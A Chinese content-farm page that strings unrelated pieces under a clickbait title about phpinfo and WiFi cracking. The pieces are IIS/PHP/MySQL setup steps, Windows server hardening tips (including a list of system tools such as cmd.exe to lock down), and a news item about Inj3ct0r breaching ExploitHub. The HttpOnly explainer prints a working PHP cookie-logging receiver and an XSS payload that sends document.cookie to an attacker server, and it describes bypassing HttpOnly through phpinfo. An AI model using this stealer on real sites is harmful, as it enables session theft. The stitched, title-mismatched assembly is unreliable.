当前位置：首页 > 破解脱壳 > 正文内容

黑客如何利用phpinfo（黑客如何利用手机破解WiFi）

hacker2年前 (2022-07-05)破解脱壳58

本文目录一览：

1、如何配置php服务器
2、黑客是如何利用高危漏洞攻击电脑的？
3、黑客是怎么渗透开源项目的？
4、如何HttpOnly的cookie与AJAX请求工作
5、围观：黑客怎么干掉黑客
6、网上说的黑客利用系统漏洞入侵,他们是怎么做到的?

如何配置php服务器

1. 安装IIS

IIS是windows平台下比较成熟的web服务，安装方法也非常简单。

打开“开始”菜单，点击“管理您的服务器”，点击“添加或删除角色”（如图所示）。

进入预备步骤后直接点下一步。到达了选择角色的地方，选择“应用程序服务（IIS,ASP.net)”

之后点击下一步，出现附加组件的选择，一个是FrontPage Server Extentions，另外一个是ASP.net，这两项我们的环境中都不需要，不必选择，如果有需要，可以选择性安装。进入下一步，是选项总结，再下一步，进入安装过程，此时提示需要插入windows 2003(R2)的安装光盘，插入光盘后，选择光驱所在驱动器下的I386，点击确定，安装过程将会继续一直到结束，并且出现成功提示

完成后对IIS进行测试，打开“开始”菜单，点击“所有程序”，进入“管理工具”，点击“internet信息服务(IIS)管理器”

展开“网站”树型节点，删除默认网站，然后新建一个网站

进入向导后，进入下一步，为网站添加描述，也就是IIS中显示的网站标示，可以随便填写，再进入下一步，为网站配置主机头，我们是用来配置本地测试环境，所以把主机头配置为127.0.0.1

进入下一步，选择目录，目录需要提前建立好，然后选择即可。继续下一步，需要选择网站权限，这里只选择读取即可。之后便可完成网站新建向导了。

需要正常的浏览网站，还需要给网站的根目录文件夹指定相应的权限，首先在网站属性中查看网站的匿名访问账户是什么，然后将这个账户设置到网站的根目录文件夹，并设置相应的访问权限

网站的匿名访问账户是：IUSR_CBLH-DDEF00B671，为文件夹设置用户访问权限

权限配置好后，在目录中新建一个index.html文件，随意输入一些文字或者html代码即可。

在网站名称上右键，点击属性，进入“属性”后点击“文档”选项卡，在此添加一个index.html和index.php（index.php添加好是为了待会不必再做配置），然后点击“确定”或者“应用”保存配置。

然后在浏览器中的地址栏中输入“”或者“”，即可看到刚才我们建立的index.html中的内容。

安装fastcgi

IIS调试好后，就可以安装fastcgi了，首先需要下载IISfastcgi，下载地址是（），安装fastcgi非常简单，只需要同意协议后连续点击下一步即可，没有任何选项。

安装php

首先下载php在windows的安装包，下载地址，这里选用php-5.3.4-nts-Win32-VC9-x86.msi做例子。下载好php-5.3.4-nts-Win32-VC9-x86.msi后，双击文件安装，接受使用协议后，为php填写安装目录，这个目录是可以更换的，指向需要放置它的位置即可。之后需要选择web服务器的安装，这里选择我们先前安装的IIS fastcgi

下一步需要配置安装选项，这里我们除了默认的选项之外增加了pear install(如图所示）

再进入下一步，就可以确认安装了。

完成安装后，还需要测试一下php是否可用。

首先打开IIS管理器，然后在先前测试IIS的网站上右键，进入“属性”，点击主目录选项卡，然后将“执行权限”配置为“纯脚本”

然后点击旁边的“配置”，查看是否有.php扩展名，如果没有的话，需要添加一个新项，将可执行文件指向“C:WINDOWSsystem32inetsrvfcgiext.dll”，扩展名为“.php”（注意有个点），动作限制为“GET,HEAD,POST,TRACE”，点击确定即可

步骤阅读

做好了这些，就可以写个小脚本来测试了，在网站的目录中新建一个test.php文件，打开后输入，保存后退出。在浏览器地址栏中输入，即可看到php信息了。

4. 安装isapi_urlwriter ISAPI扩展组件

isapi_urlwriter ISAPI扩展组件主要用来做地址重写，重写后的虚拟静态地址对搜索引擎更友好。先将ISAPI_Rewrite3安装包解压到指定的文件目录中，然后进入网站属性窗口，选择窗口中的ISAPI筛选器选项卡，点击添加按钮，在弹出的窗口中选择ISAPI_Rewrite3解压目录中的ISAPI_Rewrite.dll文件为可执行文件并确定。

END

iis7.5 PHP环境配置

windows server 2008是基于NT6 平台的新型操作系统，其对硬件性能的发挥比起其它NT平台来说有了质的飞跃，已经开始普及到了广大用户中，而且操作较2003来说更为直观和简单，受到越来越多的好评。在这里我们要介绍windows server 2008中的php环境搭建。

安装IIS

windows server 2008的IIS版本为7.0，包括fastcgi，安装十分方便。

打开“开始”菜单→“服务器管理”，出现服务器管理界面

在图中黄色框中填入服务器ip，点击打开，之后提示输入用户名和密码，验证成功后完成登录服务器。

点击“下一步”之后，需要选择功能，这里需要比默认选项多增加一个“cgi”

点击“下一步”，将会需要确认一下安装的内容，此时点击安装，即可将IIS安装在操作系统中。

安装好IIS之后，需要进行一个测试，在浏览器地址栏中输入“”，如果出现IIS7的欢迎页则说明正常。接下来需要配置一个新网站，首先打开IIS管理器（“开始”→“所有程序”→“管理工具”→“internet 信息服务（IIS）管理器”）。

然后删除默认网站，在主菜单中，展开网站菜单，然后再网站名称上右键，点击删除即可

再新建一个网站，在“网站”上右击，点击添加网站，会出现信息网站添加的表单，首先输入网站名称，例如“stourwebcms”，路径选择为网站存放的路径，单IP的服务器可以不必选择IP，主机头填写为localhost，然后点击确定。

添加好网站后，需要为网站设置用户访问权限。在iis管理器左边的网站列表中选中网站，在右边的操作列表中点击“基本设置”，在弹出窗口中点击“连接为”，弹出的窗口中会出现网站的默认用户账户，也可以更改为其它的用户。确定网站的用户账户后，将此账户的访问权限设置到网站的根目录文件夹上

打开网站目录，新建一个index.html，然后用记事本打开，输入“hello stourweb”后保存，并访问本地地址“”进行测试，网页上显示出了“hello stourweb”，说明配置成功。

安装php

在前面已经提过，IIS7中不必单独安装fastcgi，所以，我们只需要下载php安装包进行安装即可，下载地址：下载好后，打开安装程序，经过引导，配置好路径，来到选择“web server setup”的地方，在这里我们选择“IIS fastcgi”

然后点击“next”按钮，到了选择安装选项的步骤，一般安装默认的就可以了，如果要添加的话需要点击一下前面的磁盘小图标，然后选择安装，第一项是只安装选中的项目，第二项是安装所有该项目的子项目。配置好后进入下一步

配置好后，点击“next”然后点击“install”即可安装php。

当php安装完成后会自动在iis的处理程序映射中增加一条fastcgi到php的映射关系

安装完成后，我们还是需要测试一下，打开刚才新建的网站目录，新建一个test.php文件，用记事本打开，输入

?php

echo phpinfo();

保存退出，再从浏览器中访问

显示出php信息，说明php环境安装成功。

安装isapi_urlwriter ISAPI扩展组件

isapi_urlwriter ISAPI扩展组件主要用来做地址重写，重写后的虚拟静态地址对搜索引擎更友好。先将ISAPI_Rewrite3安装包解压到指定的文件目录中，然后双击iis的ISAPI筛选器配置项，进入网站ISAPI组件配置窗口，点击添加按钮，在弹出的窗口中选择ISAPI_Rewrite3解压目录中的ISAPI_Rewrite.dll文件为可执行文件并确定。

ISAPI_Rewrite3组件是一个32位的程序，因此在64位操作系统应用池进程下默认不工作，因此需要在网站所属应用进程池的高级设置中将进程池设置为32位兼容

END

Mysql数据库安装

下载mysql()，安装过程比较简单，首先配置路径，然后选择安装选项，一般采用默认安装的方式，之后会进入一个配置向导界面

步骤阅读

连续下一步，需要选择配置方式，这里选择配置方式，我们需要手动配置，所以选择detailed configuration，然后点击“下一步”

这里需要选择服务器类型，如果是开发用的测试环境，选择developer Machine ，如果是服务器用，则选择Server Machine，当然单一用途的服务器还可以选择dedicated mysql server machine。选择好后进入下一步

接下来是选择服务器使用，第一个是多功能数据库，可以使用 InnoDB engine和MyISAM engine。第二个选项，它的性能偏向于InnoDB，但是同时支持MyISAM engine。第三个选项是偏向于分析功能的MyISAM。至于这三个选项有什么区别，其实只要知道，MyISAM类型的数据库引擎可以为php提供强大的检索和分析功能。InnoDB的性能则偏重于存储。

所以如果只做web服务器的话选择第三项即可，如果是有其它用途，建议选择第一项。

下一步需要选择服务器上的连接数量，这里如果是测试用的小服务器可以选择最少的第一项，如果是流量巨大的网站，需要选择第二项，或者第三项自行填写。

之后是网络连接的选项，“enable TCP/IP Networking”可以按照需求来选择，如果不做集群的话可以把勾去掉，如果是在内网环境，不为mysql做路由规则是完全可以打开此项的。可以直接添加一个防火墙例外给3306端口。端口号可以选择，但是推荐默认的3306。还有一项是是否开启严谨模式，此项推荐勾选

点击下一步，选择默认字符集，这里选择自定义的utf8字符集

进入下一步，需要设定windows选项，这里推荐安装windows服务，并且自动启动。第二个选项，如果有必要，可以选择添加一个环境变量，可以方便命令行指向。

配置好后，进入下一步，需要为root用户设定密码，请设置一个比较复杂的密码以增加安全性，另外请牢记自己设置的密码，否则遗忘了后需要重置密码十分麻烦。还有一个是否允许root用户从远程登录的选项，此处最好不勾选，否则安全性将会降低。

到此配置就全部结束了，点击下一步，会出现安装总结，点击“execute”执行安装即可。

安装成功后，我们依然需要对此进行测试。

在网站中新建一个测试php文件test.php，我们使用pdo链接mysql作为测试。

输入

?php

$db=new PDO("mysql:host=localhost;dbname=test","root","刚才设置的密码");

if ($db)

{

echo "ok";

}

访问，如果屏幕上打印出了ok，表示mysql安装成功。

END

安全配置建议

安全软件

一款好的安全软件能有效防御来自计算机病毒、恶意软件和木马的威胁，但能用于服务器的安全软件并不多，其中大部分都是收费的，平常个人所用的金山毒霸和360等不能安装到windows server系列的服务器操作系统上，但他们都有相应的服务器版本并且提供免费升级，在他们的官网上面都能够找到。

防火墙

合理的配置好防火墙能有效的阻止各种恶意入侵，因为各种网络入侵都是通过相应的网络端口完成的。网络端口是服务器上的各种网络服务开启的，他们对外提供各种网络服务，如http、ftp、smtp等。自己的服务器上需要提供哪些网络服务就只开启这些服务的相应端口，如服务器上提供网站服务，就需要开启http的80端口，如需要提供ftp服务就要开启21端口；有些网络服务不需要对外提供服务就不应该开启，如sql server数据库不需要对外提供服务，就应该在防火墙中关闭掉1433端口。

Windows sever 2003和2008都自带防火墙，其实能简单有效的利用这些自带的防火墙就能有效的完成端口的开闭管理。

l Windows server 2003服务器防火墙配置

1) 鼠标右键单击“网上邻居”，选择“属性”。

2) 然后鼠标右键单击“本地连接”，选择“属性”。如图选择“高级”选项，选中“Internet连接防火墙”，确定后防火墙即起了作用。

点击“设置(G)...”按钮可进行高级设置。其中列出了可用的网络服务，选中后允许其打开网络端口并通信，反之则关闭其网络通信；单击“添加”则可以增加网络服务或打开指定的网络端口

Windows server 2008服务器防火墙配置

1) 在控制面板中打开网络和共享中心

2) 点击“windows防火墙”弹出防火墙配置窗口，在此窗口中要确认防火墙服务已经开启

3) 单击“允许程序或功能通过Windows防火墙”弹出网络服务端口配置窗口，在此窗口中可以选择允许打开端口并通信的网络服务，单击“允许运行另一程序”来自定义开启某一网络服务或端口

用户管理

系统中用户的数量能越少越好，并且每个用户都被用于特定的功能，如可以新建一个专门用于对网站进行匿名授权的账户（如条件允许，可以为每个网站新建一个独立的账户进行分别授权，这些能够隔离开各网站的授权，提高各网站的安全性，不至于一个网站被入侵后能够有权限访问到其它网站的文件目录）。另外最重要的一点是要为每个账户设置一个独立且复杂的密码，防止账户密码被猜解和穷举。

文件系统权限管理

l C盘只给administrators 和system权限，其他的权限不给，其他的盘也可以这样设置，这里给的system权限也不一定需要给，只是由于某些第三方应用程序是以服务形式启动的，需要加上这个用户，否则造成启动不了。

l Windows目录要加上给users的默认权限，否则ASP和ASPX等应用程序就无法运行。其实没有必要单独设置Instsrv和temp等目录权限。

l 另外在c:/Documents and Settings/这里相当重要，后面的目录里的权限根本不会继承从前的设置，如果仅仅只是设置了C盘给administrators权限，而在All Users/Application Data目录下会出现everyone用户有完全控制权限，这样入侵这可以跳转到这个目录，写入脚本或只文件，再结合其他漏洞来提升权限;

譬如利用serv-u的本地溢出提升权限，或系统遗漏有补丁，数据库的弱点，甚至社会工程学等等N多方法，在用做web/ftp服务器的系统里，建议是将这些目录都设置的锁死。其他每个盘的目录都按照这样设置，每个盘都只给adinistrators权限。

另外，还将：

net.exe

cmd.exe

netstat.exe

regedit.exe

at.exe

attrib.exe

cacls.exe

format.exe

这些文件都设置只允许administrators访问。

l 网站的目录最好独立到一个磁盘中，新建一个为网站匿名访问而独立授权的账户，让此账户可以访问和编辑此目录，移除其它不必要的账户对此目录的访问权限，能有效防止网站被入侵后从而涉及到整个系统被控制

日常维护建议

定期运行安全软件进行快速扫描

定期运行一下安全软件，可以看到安全软件的引擎或病毒库是否已经更新到了最新版本，如果没有可以即时查找原因，看是否是安全软件未运行、升级端口被禁用或其它原因，虽然安全软件可以在后台即时扫描各种文件操作，以防止病毒入侵，但有些恶意软件、流氓软件或插件则不是实时防护的，虽然这些软件不会造成服务器宕机，但也会影响服务器性能。

定期检查防火墙端口配置

随着服务器上的网络服务越来越多，需要打开的网络端口也越来越多，但有些端口是不需要开放的，例如你安装了一个数据库软件（mysql、oracle等），这些数据库服务很可能只需要在你服务器的内部访问，就完全没有必要让其通过防火墙，这样能够提高服务器的安全，服务器对外提供的端口越少越好；

虽然在安装网络服务的过程中，防火墙会提示你有网络端口正在打开，是否允许通过防火墙，但有些管理员没有细心看提示，直接就同意了，造成了大量没有必要打开的网络端口被打开了，特别是一些木马或恶意软件会混水摸鱼，伪装提示信息来诱骗管理员打开网络端口，造成大量的安全隐患。进入防火墙配置界面，选择相应的端口或网络服务，点击“详细信息”则可以看到此项应用的详细信息，根据这些信息来判断其是否应该开启这个端口。

任务管理器中观察有无可疑进程，了解系统资源使用情况

任务管理器可以简单并快速的了解服务系统资源的使用情况，并即时查看系统运行的进程和他们占用的系统资源，根据服务器上已开启的各种应用的服务来判断哪些进程是非法的，哪些进程占用的系统资源过多。了解到这些信息后就可以即时的对服务器进行调整，特别是占用资源过多的进程进行分析，看是否有什么异常并即时进行调整。

l 观察系统进程，并自定义进程属性

查看网络使用情况

查看系统资源使用情况

检查IIS，了解网站安装情况

随时了解服务器上网站的安装状况，并做以下检查：

1、看各个网站定义的主机头是否异常

2、绑定的域名是否完整

3、主目录设置是正确

4、用户权限设置是否合理

5、查看IIS的应用程序池设置是否合理，每个池下面托管的网站是否过多，是否需要设置新的应用池，是否有多余的应用池可以删除。

查看系统日志，仔细检查错误、警告日志发生的原因，并急时修复相应的问题。

检查系统用户，查看有无多余，可疑用户账户，查看每个账户所属的用户组，特别是administrators组下面的用户。服务器被入侵时会出现一些欺骗性的账户并被加入到administrators组中，特别留心新建的多余账户，弄清这些账户的用途，如果发现是入侵者建立的账户，要即时查找账户是被创建的原因，并修复相应的漏洞。

检查文件系统，确保磁盘被合理分区，各个分区应该有各自的功能，如系统、数据库、网站、备份等。各个分区的用户授权是不相同的，如系统、备份等不需要网站的专门授权账户访问，数据库分区需要对数据库账户进行单独的授权等。既然规划好了文件分区和功能，并进行了相应的授权，就要防止文件被乱放，以免造成安全隐患。

还要经常检查各种新建的文件夹和文件（特别是来历不明，名称畸形的隐藏文件夹和文件）这些都有可能是入侵者留下的入侵痕迹。

清除垃圾文件，随时系统运行时间的增加，会产生很多的临时文件和日志文件，占用宝贵的磁盘资源，如果磁盘的可用空间过小（特别是系统盘）还会影响服务器性能。

1、临时文件（安装程序、系统升级、应用程序等产生的）产生的，主要在系统盘，可以看哪些文件夹的体积异常大，可分析其内部文件，确认是临时文件后将其删除

2、日志文件，主要是IIS产生的，这些日志文件对于查看网站运行状态、访问历史很有用，但日志有时效性，如果超过其三个月就没有什么用处了，但它会占用大量的磁盘空间，所以需要定期将其删除。

定期检查磁盘状态并进行碎片整理，随着系统运行时间的增长，特别是大量的IO操作后，磁盘上会产生大量的文件碎片，这些碎片过多则会严重影响服务器性能，所以定期（建议一个月）进行磁盘碎片检查，如果系统提醒需要进行碎片整理，则进行整理。

及时升级操作系统补丁，操作系统有各种大量的补丁，特别是一些重要的安全补丁需要即时升级，这样会有效防止黑客和病毒入侵。

及时备份重要的文件、应用、数据库。备份分为本地备份和异地备份，有条件的可以进行异地备份，备份是为了以防万一，当数据丢失或应用损坏时，备份就是救命稻草，因此合理的备份计划是非常有必要的。

不要随意下载安装来历不明的软件，特别是需要连接网络或需要打开端口的。现在网上许多的程序都内置有木马或恶意程序，所以不要下载和安装网上的不明软件，特别是一些小网站的。

END

黑客是如何利用高危漏洞攻击电脑的？

比方说有个漏洞是你电脑的某个不在使用的端口处于开启状态，可以被访问，黑客可以通过你的ip和端口访问到你的计算机，传输一个木马程序给你。这个程序是他编写用来控制你的电脑行为的，此后有可能监视你的操作或者直接用该木马程序达到远程控制你电脑的目的

黑客是怎么渗透开源项目的？

恶意黑客参与了小型开源软件的开发，在自身关键应用中包含了这些开源软件的公司企业就可能面临遭遇漏洞利用的风险。安全专家指出，这些项目的开源本质和代码的广泛应用，对企业造成了切实的威胁。

一旦潜入开源项目，罪犯就有多种下手方式可供选择，但必须动作够快。因为无论是后门键盘记录器还是某种木马，如果不是动手够快，或者真的非常非常隐蔽，用不了多久就会被 “众人之眼” 揪出。

网络罪犯之所以热衷于黑开源项目，正是由于开源项目兼具灵活性和可用性的特点，能为黑客行动的开展带来大量机会。真可谓众所周知的攻击途径了。而且开源项目被黑概率很可能比大众认知的要高得多。安全公司 Checkmarx 安全研究主管 Eran Yalon 就表示：

几乎所有开源项目都要求贡献者的工作要经过项目其他成员审核才能并入项目。审核层级随贡献者个人声誉而递减，贡献者受信度越高，则审核层级越少。尤其是在大型知名开源项目中，比如主流 Linux 发行版，整个审核过程非常精细完备，也有充足的人力资源持续执行这一规程。项目越小，则可供保障安全的资源就越少。所以，小型项目被黑的情况也就更常见了。

如何HttpOnly的cookie与AJAX请求工作

随着B/S的普及，我们平时上网都是依赖于http协议完成，而Http是无状态的，即同一个会话的连续两个请求互相不了解，他们由最新实例化的环境进行解析，除了应用本身可能已经存储在全局对象中的所有信息外，该环境不保存与会话有关的任何信息，http是不会为了下一次连接而维护这次连接所传输的信息的。所以为了在每次会话之间传递信息，就需要用到cookie和session，无论是什么，都是为了让服务器端获得一个token来检查合法性，很多时候都是在cookie中存储一个sessionID，服务器来识别该用户，那么安全隐患也就引申而出了，只要获得这个cookie，就可以取得别人的身份，特别是管理员等高级权限帐号时，危害就大了，而XSS就是在别人的应用程序中恶意执行一段JS以窃取用户的cookie。

那么如何获得Cookie劫持呢?在浏览器中的document对象中，就储存了Cookie的信息，而利用js可以把这里面的Cookie给取出来，只要得到这个Cookie就可以拥有别人的身份了。下面简单说说如何窃取cookie。

接收cookie的PHP文件ck.php为：

?php

$cookie = $_GET['c'];

$ip = getenv ('REMOTE_ADDR');

$time=date("j F, Y, g:i a");

$referer=getenv ('HTTP_REFERER');

$fp = fopen('cookie.txt', 'a');

fwrite($fp, 'Cookie: '.$cookie.'br IP: ' .$ip. 'br Date and Time: ' .$time. 'br Referer: '.$referer.'brbrbr');

fclose($fp);

把这个文件放在自己的服务器上，比如我们搭建的服务器为： .

那么构造XSS语句：

scriptwindow.open(''+document.cookie)/script

当执行script成功时就会把cookie发送到自己的服务器下cookie.txt文件中。XSS攻击是多么可怕的事情。

说了这么多，貌似还没有提到HttpOnly，这是哪般？莫及！这就到了！如何保障我们的Cookie安全呢？Cookie都是通过document对象获取的，我们如果能让cookie在浏览器中不可见就可以了，那HttpOnly就是在设置cookie时接受这样一个参数，一旦被设置，在浏览器的document对象中就看不到cookie了。而浏览器在浏览网页的时候不受任何影响，因为Cookie会被放在浏览器头中发送出去(包括Ajax的时候)，应用程序也一般不会在JS里操作这些敏感Cookie的，对于一些敏感的Cookie我们采用HttpOnly，对于一些需要在应用程序中用JS操作的cookie我们就不予设置，这样就保障了Cookie信息的安全也保证了应用。

给浏览器设置Cookie的头如下：

Set-Cookie: =[; =]

[; expires=][; domain=]

[; path=][; secure][; HttpOnly]

如果 Cookie 具有 HttpOnly 特性且不能通过客户端脚本访问，则为 true；否则为 false。默认值为 false。

但是，也可以看到HttpOnly并不是万能的，首先它并不能解决XSS的问题，仍然不能抵制一些有耐心的黑客的攻击，甚至一些基于XSS的proxy也出现了，但是已经可以提高攻击的门槛了，起码XSS攻击不是每个脚本小子都能完成的了，而且其他的那些攻击手法因为一些环境和技术的限制，并不像Cookie窃取这种手法一样通用。

HttpOnly也是可能利用一些漏洞或者配置Bypass的，关键问题是只要能取到浏览器发送的Cookie头就可以了。譬如以前出现的Http Trace攻击就可以将你的Header里的Cookie回显出来，利用Ajax或者flash就可以完成这种攻击，这种手法也已经在Ajax和flash中获得修补。另外一个关于配置或者应用程序上可能Bypass的显著例子就是phpinfo，大家知道phpinfo会将浏览器发送的http头回显出来，其中就包括我们保护的auth信息，而这个页面经常存在在各种站点上，只要用ajax取phpinfo页面，取出header头对应的部分就可以获得Cookie了。一些应用程序的不完善也可能导致header头的泄露，这种攻击方式对于基本验证保护的页面一样可以攻击。

HttpOnly在IE 6以上，Firefox较新版本都得到了比较好的支持，并且在如Hotmail等应用程序里都有广泛的使用，并且已经是取得了比较好的安全效果。

那问题就来了，大家想想，HttpOnly 主要是为了限制web页面程序的browser端script程序读取cookie，实际是浏览器通过协议实现限制的，黑客可不会那么傻，肯定不会用HTTP协议来读取cookie，肯定是在socket层面写抓包程序，相当于写一个低于IE6版本的应用程序。

所以，HttpOnly并不是万能的。

围观：黑客怎么干掉黑客

“黑客”是一种神秘、危险却又渗出魅力的身份，他们在网络上几乎无所不能，为非作歹者有之，惩恶扬善者有之，穷极无聊亦有之。某国国防部被黑、某官方网站被黑的新闻时常见诸报端，这是他们象征着力量与胜利的图腾，换来的是我们心中隐隐的崇拜。但是，黑客与黑客互掐的新闻似乎极其罕见。

据 ZD Net 报道，曾经声称黑进北约（NATO）数据库的黑客组织 Inj3ct0r 在 Facebook上宣布成功黑掉了另一个知名黑客组织——ExploitHub。

其中 Inj3ct0r 团队是提供零日（0day）漏洞的一大卖家，而 ExploitHub 是由 NSS Labs 建立的漏洞中心。两个团队都属于独立的黑客组织，靠寻找漏洞和售卖黑客软件牟利，因此乍看之下似乎是典型的“黑帮内讧”。

但若深究一下 ExploitHub 的来头，就会发现此事必有蹊跷。

NSS Labs 是全球最知名的网络安全研究和评测机构，他们通过模拟用户真实应用场景，进行产品评测和数据分析。NSS Labs 在 1999 年首创的入侵检测/防护系统评测标准已经成为业界公认的入侵防护系统（IPS）的“试金石”，其 Real-world 测试方案是业界唯一能够真正评估 IPS 防御力的方法。

因此 ExploitHub 严格来说并不能算是“黑客组织”，更像是一个市场，攻击代码的开发者可以将恶意软件和漏洞直接销售给安全专家用于实际测试。

在宣布“战况”的同时，Inj3ct0r 声称这次攻击盗取了总共价值 242333 美金的私有漏洞利用代码。下图为 Inj3ct0r 为证明他们的入侵而提供的 PHPinfo：

随后，ExploitHub 发表了声明承认受到入侵，并表示被入侵的服务器确实在安装程序后遗漏了“安装脚本”没有删除，以至于可被访问。同时声称被黑的数据库“只包含网络应用程序以及相关的产品信息，比如（被出售的）漏洞名称、价格、作者等，不包括任何有实际用途的信息，比如漏洞利用代码。”

紧接着，Inj3ct0r 团队在 Facebook 上放出了一分公告，包括漏洞名称，价格，创建日期，作者id，作者用户名和各种漏洞的价码，其中大部分都是 Inj3ct0r 的黑客 Mario的作品。并承诺如果“like”次数超过 30000 他们就会在本月 16 日公布这些漏洞的更多信息。目前“like”数字达到了 15500 个，而增速却明显放缓。

目前 ExploitHub 的网站已经被关闭。

NSS 实验室在向世人介绍他们新奇的检测模式时，其总裁里克·莫伊是这样解释的：

“如果不能从坏人的角度思考的话，何谈‘检测’？于是，我们选择走出实验室，来到真实的网络环境中直面威胁，以找到那些罪恶的本源。”